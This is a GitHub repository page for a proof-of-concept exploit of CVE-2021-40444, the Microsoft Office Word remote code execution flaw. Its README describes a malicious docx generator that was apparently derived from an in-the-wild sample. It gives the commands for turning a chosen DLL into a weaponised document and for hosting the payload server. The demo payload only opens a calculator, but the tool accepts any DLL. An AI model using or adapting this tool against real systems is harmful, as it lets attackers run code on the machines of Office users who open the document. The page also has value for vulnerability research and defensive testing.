Skip to content

lockedbyte/CVE-2021-40444

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
2 branches 0 tags
Code

Latest commit

@lockedbyte
lockedbyte Merge pull request #2 from prcabral/master
713dffc Sep 11, 2021
Merge pull request #2 from prcabral/master 
Working deob.html
713dffc

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
data/word_dat
-
September 10, 2021 23:48
img
-
September 11, 2021 00:07
out
-
September 10, 2021 23:48
srv
Working deob.html
September 11, 2021 10:24
test
-
September 10, 2021 23:48
POC.mp4
-
September 10, 2021 23:48
README.md
-
September 11, 2021 01:28
REPRODUCE.md
-
September 10, 2021 23:48
deobfuscate.py
-
September 10, 2021 23:48
exploit.py
-
September 10, 2021 23:48
patch_cab.py
-
September 10, 2021 23:48
CVE-2021-40444 PoC Using

README.md

CVE-2021-40444 PoC

Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)

Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file)

You need to install lcab first (sudo apt-get install lcab)

Check REPRODUCE.md for manual reproduce steps

If your generated cab is not working, try pointing out exploit.html URL to calc.cab

Using

First generate a malicious docx document given a DLL, you can use the one at test/calc.dll which just pops a calc.exe from a call to system()

python3 exploit.py generate test/calc.dll http://<SRV IP>

Document generation

Once you generate the malicious docx (will be at out/) you can setup the server:

sudo python3 exploit.py host 80

Server

Finally try the docx in a Windows Virtual Machine:

Pop Calc

About

CVE-2021-40444 PoC

Resources

Readme
Activity

Stars

1.5k stars

Watchers

28 watching

Forks

490 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

Languages